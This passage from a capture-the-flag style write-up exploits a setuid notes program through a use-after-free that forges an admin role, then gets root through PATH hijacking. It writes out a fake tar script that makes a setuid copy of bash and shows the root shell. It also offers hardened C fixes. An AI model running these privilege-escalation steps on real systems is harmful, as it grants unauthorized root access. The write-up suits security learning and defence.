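   Returns 1 if the stale pointer now reads as the admin role. */
int vulnerable_flow(void)
{
    char note_text[REC_SIZE], *note;
    char *s = create_user("whatever");
    free(s);                      /* s dangles */
    forged_note(note_text);
    note = write_note(note_text); /* likely the same chunk */
    int granted = is_admin(s);    /* use after free */
    free(note);
    return granted;
}

/* Fix: delete through a double pointer and clear it, as option 7 already
   does for notes. */
void delete_user(char **s)
{
    free(*s);
    *s = NULL;
}

/* Same sequence with the fix applied. Returns 0: no user, so no admin. */
int fixed_flow(void)
{
    char note_text[REC_SIZE], *note;
    char *s = create_user("whatever");
    delete_user(&s);
    forged_note(note_text);
    note = write_note(note_text);
    int granted = is_admin(s);    /* s == NULL: denied */
    free(note);
    return granted;
}
```

Clearing the pointer closes this particular path, but the deeper design problem is that the privileged decision reads a role string out of the heap at all: a setuid program should derive the role from getuid() at the moment of the check rather than trust bytes that user input could have reached.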

After that, tar -czvf /root/backups/backup_notes.tar.gz /opt/notes is easy to deal with: tar is not invoked by an absolute path but looked up through PATH, so we just put a directory containing our own tar at the front of PATH, and running option 8 then executes our command as root.
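system() hands the command line to /bin/sh, which looks up a bare tar through whatever PATH the caller brought in; that is the whole reason the fake tar in /tmp works. The following is an added example, not the binary's code, of how the backup step would look with an absolute path, execve and a fixed environment, so neither PATH nor any other inherited variable decides what runs as root. run_trusted and backup_notes are assumed names; the paths are the ones from the write-up.

```c
/* Added example, not the binary's code: the backup step without system().
   execve() of an absolute path under a fixed environment means no shell,
   no PATH lookup and no inherited variables in the privileged child. */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run argv[0], which must be an absolute path, with a minimal environment.
   Returns the child's exit status, or -1 if the request is refused or fails. */
int run_trusted(char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid;
    int status;

    if (!argv || !argv[0] || argv[0][0] != '/')
        return -1;                /* a relative name would be resolved via PATH */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, clean_env);   /* no shell, no inherited env */
        _exit(127);                         /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Option 8 as the hardened program would issue it (paths from the write-up). */
int backup_notes(void)
{
    char *const argv[] = { "/bin/tar", "-czvf",
                           "/root/backups/backup_notes.tar.gz", "/opt/notes", NULL };
    return run_trusted(argv);
}
```

The refusal of relative names is deliberate: it makes the mistake in the original unrepresentable rather than relying on every caller to remember. Whether a note-taking tool needs to be setuid root to write a tarball under /root at all is the question to ask before any of this.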

tbuckley@gofer:/usr/local/bin$ ./notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 1

Choose an username: whatever

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 3

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
xxxxxxxxxxxxxxxxxxxxxxxxadmin
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: xxxxxxxxxxxxxxxxxxxxxxxxadmin
Role: admin

Just as we expected. Perfect.

Now build the fake tar.

tbuckley@gofer:/tmp$ echo 'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' > tar
tbuckley@gofer:/tmp$ chmod +x tar
tbuckley@gofer:/tmp$ ls -la
total 60
drwxrwxrwt 14 root root 4096 Aug 5 15:49 .
drwxr-xr-x 18 root root 4096 Jul 19 12:44 ..
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .font-unix
drwxr-xr-x 2 jhudson jhudson 4096 Aug 5 14:36 hsperfdata_jhudson
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .ICE-unix
drwx------ 3 jhudson jhudson 4096 Aug 5 11:02 lu5012xuigb9.tmp
drwx------ 2 jhudson jhudson 4096 Aug 5 14:36 lu9624y25uma.tmp
srwxr-xr-x 1 jhudson jhudson 0 Aug 5 14:36 OSL_PIPE_1000_SingleOfficeIPC_b31bb423faa33322afe433cf9acd1272
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-apache2.service-1K3kih
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-logind.service-FsKf3f
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-timesyncd.service-0MAATi
-rwxr-xr-x 1 tbuckley tbuckley 52 Aug 5 15:49 tar
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .Test-unix
drwx------ 2 root root 4096 Aug 5 08:05 vmware-root_617-4022243191
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .X11-unix
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .XIM-unix

Set PATH accordingly and run notes again.

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 8

Access granted!

Check the tmp directory.

tbuckley@gofer:/tmp$ ls -la
total 1268
drwxrwxrwt 14 root root 4096 Aug 5 15:51 .
drwxr-xr-x 18 root root 4096 Jul 19 12:44 ..
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .font-unix
drwxr-xr-x 2 jhudson jhudson 4096 Aug 5 14:36 hsperfdata_jhudson
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .ICE-unix
drwx------ 3 jhudson jhudson 4096 Aug 5 11:02 lu5012xuigb9.tmp
drwx------ 2 jhudson jhudson 4096 Aug 5 14:36 lu9624y25uma.tmp
srwxr-xr-x 1 jhudson jhudson 0 Aug 5 14:36 OSL_PIPE_1000_SingleOfficeIPC_b31bb423faa33322afe433cf9acd1272
-rwsr-sr-x 1 root root 1234376 Aug 5 15:51 rootbash
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-apache2.service-1K3kih
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-logind.service-FsKf3f
drwx------ 3 root root 4096 Aug 5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-timesyncd.service-0MAATi
-rwxr-xr-x 1 tbuckley tbuckley 52 Aug 5 15:49 tar
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .Test-unix
drwx------ 2 root root 4096 Aug 5 08:05 vmware-root_617-4022243191
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .X11-unix
drwxrwxrwt 2 root root 4096 Aug 5 08:05 .XIM-unix
tbuckley@gofer:/tmp$ ./rootbash -p
rootbash-5.1# id
uid=1002(tbuckley) gid=1002(tbuckley) euid=0(root) egid=0(root) groups=0(root),1002(tbuckley),1004(dev)
rootbash-5.1# whoami
root
rootbash-5.1# cd /root
rootbash-5.1# ls -la
total 80
drwx------ 14 root root 4096 Jul 17 16:55 .
drwxr-xr-x 18 root root 4096 Jul 19 12:44 ..
drwxr-xr-x 2 root root 4096 Apr 28 12:19 backups
lrwxrwxrwx 1 root root 9 Nov 3 2022 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 3 root root 4096 Apr 26 23:59 .config
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Desktop
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Documents
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Downloads
drwxr-xr-x 3 root root 4096 Oct 28 2022 .local
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Music
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Pictures
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Public
-rw-r----- 1 root root 33 Aug 5 08:05 root.txt
drwxr-xr-x 2 root root 4096 Jul 27 11:57 scripts
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Templates
drwxr-xr-x 2 root root 4096 Apr 26 23:59 Videos
-rw-r--r-- 1 root root 39 Jul 17 16:55 .vimrc
-rw------- 1 root root 54 Apr 26 23:59 .Xauthority
-rw------- 1 root root 1626 Apr 27 00:16 .xsession-errors

Done.